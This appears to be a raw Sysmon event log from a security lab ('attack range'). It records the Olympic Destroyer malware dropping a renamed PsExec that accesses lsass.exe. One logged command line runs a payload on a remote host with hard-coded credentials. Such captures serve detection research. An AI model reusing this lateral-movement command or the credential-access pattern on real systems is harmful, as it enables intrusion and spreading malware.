10:56:52.074{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F4-6216-B305-000000003802}6508C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000291630Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:52.074{C8EA50B7-12F3-6216-B105-000000003802}6400C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 23542300x8000000000000000291629Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:52.057{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=C1DA714471190FD70F4478E5B103BB2C,SHA256=358A98C235D679474702D4270D6A22F1DE5C934A739D15AC8D9740488AE79623,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291628Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:52.057{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12F3-6216-B105-000000003802}6400C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291627Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:52.057{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12F3-6216-B105-000000003802}6400C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000291626Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:56:52.041{C8EA50B7-12F3-6216-B105-000000003802}6400C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000291625Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:52.004{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12F3-6216-B205-000000003802}6404C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291624Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:52.004{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12F3-6216-B205-000000003802}6404C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291623Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:52.004{C8EA50B7-12F3-6216-B205-000000003802}64041188C:\Windows\system32\conhost.exe{C8EA50B7-12F3-6216-B105-000000003802}6400C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000217746Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:52.417{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ED14774D83E569CB1B24A70309F2A7FE,SHA256=BF1D846E6FE6BE63E0EB34DB4BE3800E5589BAC59D5FCCC9ECC85D52E4A75C08,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217745Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:52.073{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E1223B2172A9A3C0C2483DDAB079366,SHA256=C4A0F964C952BEEE7B4E0F7BC1E17DBCB5EF666CE7CEA68EF1F02F483F0F7A61,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291695Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:53.966{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-12F5-6216-BA05-000000003802}6656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291694Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:53.966{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F5-6216-BA05-000000003802}6656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291693Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:53.824{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-12F5-6216-B905-000000003802}6632C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291692Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:53.824{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291691Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:53.824{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291690Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:53.824{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291689Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:53.824{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291688Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:53.791{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F5-6216-B905-000000003802}6632C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291687Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:53.791{C8EA50B7-12E6-6216-4B05-000000003802}67926924C:\Temp\olympic_destroyer.exe{C8EA50B7-12F5-6216-B905-000000003802}6632C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000291686Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:53.801{C8EA50B7-12F5-6216-B905-000000003802}6632C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\239.255.255.250 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 534500x8000000000000000291685Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:53.791{C8EA50B7-12EB-6216-6C05-000000003802}6848C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 534500x8000000000000000291684Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:53.744{C8EA50B7-12EE-6216-8205-000000003802}344C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 534500x8000000000000000291683Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:53.690{C8EA50B7-12F5-6216-B705-000000003802}6708C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000291682Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:53.674{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12F5-6216-B705-000000003802}6708C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291681Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:53.674{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12F5-6216-B705-000000003802}6708C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000291680Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:56:53.659{C8EA50B7-12F5-6216-B705-000000003802}6708C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000291679Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:53.606{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12F5-6216-B805-000000003802}6616C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291678Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:53.606{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12F5-6216-B805-000000003802}6616C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291677Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:53.575{C8EA50B7-12F5-6216-B805-000000003802}66166624C:\Windows\system32\conhost.exe{C8EA50B7-12F5-6216-B705-000000003802}6708C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291676Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:53.543{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-12F5-6216-B805-000000003802}6616C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291675Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:53.538{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F5-6216-B805-000000003802}6616C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291674Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:53.421{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291673Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:53.421{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291672Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:53.421{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291671Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:53.421{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291670Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 